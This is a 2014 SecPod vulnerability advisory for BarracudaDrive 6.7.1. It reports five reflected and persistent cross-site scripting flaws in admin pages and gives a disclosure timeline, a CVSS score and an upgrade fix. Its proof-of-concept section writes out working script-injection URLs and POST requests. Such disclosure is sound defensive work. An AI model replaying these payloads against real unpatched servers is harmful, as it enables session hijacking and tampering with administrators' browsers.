?###############################################################################
#
# Title : BarracudaDrive Multiple XSS Vulnerabilities
# Author : Shakeel Bhat SecPod Technologies Pvt. Ltd. http://www.secpod.com
# Vendor : http://barracudadrive.com
# Advisory : http://secpod.org/blog/?p=2309
# http://secpod.org/advisories/SecPod_Advistory_BarracudaDrive_6.7.1_Mult_XSS_Vuln.txt
# Software : BarracudaDrive 6.7.1
# Date : 20/03/2014
#
##############################################################################
SecPod ID: 1052 20/03/2014 Issue Discovered
25/03/2014 Vendor Notified
26/03/2014 Vendor Responded
27/03/2014 Vendor Solution
28/04/2014 Advisory Released
Class: Cross-Site Scripting Severity: Medium
Overview:
---------
BarracudaDrive Multiple Reflected (1,3) and Persistent(2,4,5) Cross-site
Scripting Vulnerabilities.
Technical Description:
----------------------
Multiple Reflected and Persistent Cross-Site Scripting vulnerabilities are
present in BarracudaDrive, as it fails to properly sanitize user-supplied
input.
1) Input passed via the 'role' parameter to 'protected/admin/roles.lsp' is not
properly verified before it is returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.
2) Input passed via the 'name' parameter to '/admin/user.lsp' is not
properly verified before it is returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.
3) Input passed via the 'path' parameter in
'/rtl/protected/admin/wizard/setuser.lsp' is not properly verified before it is
returned to the user. This can be exploited to execute arbitrary HTML and
script code in a user's browser session in the context of a vulnerable site.
4) Input passed via the 'host' parameter in '/admin/tunnelconstr.lsp' is not
properly verified before it is returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.
5) Input passed via the 'newpath' parameter in 'protected/admin/wfsconstr.lsp'
is not properly verified before it is returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in the context of a vulnerable site.
The vulnerability has been tested in BarracudaDrive 6.7.1, Other versions may
also be affected.
Impact:
--------
Successful exploitation allows an authenticated attacker to execute arbitrary
HTML and script code in a user's browser session in the context of a
vulnerable site.
Affected Software:
------------------
BarracudaDrive 6.7.1
Tested on,
BarracudaDrive 6.7.1 on Windows OS
References:
-----------
http://secpod.org/blog/?p=2309
http://secpod.org/advisories/SecPod_Advistory_BarracudaDrive_6.7.1_Mult_XSS_Vuln.txt
Proof of Concept:
1) localhost/rtl/protected/admin/roles.lsp?role=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
2) POST /rtl/protected/admin/user.lsp
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/rtl/protected/admin/user.lsp
Cookie: tzone=--330; z9ZAqJtI=cc48e5f75329a847
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
POSTDATA:
name=<script>alert("xss1")</script>&pwd=erterter&inactive=20&maxUsers=3&recycle=true&pwdl=false&info=
3) POST /rtl/protected/admin/wizard/setuser.lsp
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/rtl/protected/admin/wizard/setuser.lsp
Cookie: tzone=--330; z9ZAqJtI=cc48e5f75329a847
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
POSTDATA
user=abc&password=def&path=<script>alert("xss")</script>
4) POST /rtl/protected/admin/tunnelconstr.lsp
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/rtl/protected/admin/tunnelconstr.lsp?
Cookie: tzone=--330; z9ZAqJtI=cc48e5f75329a847
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
POSTDATA
constr=&host=<script>alert("xss")</script>&port=22&commonports=&pathsub=Add
5) POST /rtl/protected/admin/wfsconstr.lsp
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: tzone=--330; z9ZAqJtI=cc48e5f75329a847
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
POSTDATA
basepath=&constr=qw&pathsub=abc&newpath=<script>alert("XSS")</script>&GET=on&PROPFIND=on&readaccess=on
Solution:
-------
Upgrade to BarracudaDrive version 6.7.2
Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = MEDIUM
AUTHENTICATION = SINGLE INSTANCE
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = PARTIAL
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 3.5 (AV:N/AC:M/Au:SI/C:N/I:P/A:N)
CVSS Temporal Score = 3.1
Risk factor = Medium
Credits:
--------
Shakeel Bhat of SecPod Technologies has been credited with the
discovery of this vulnerability.
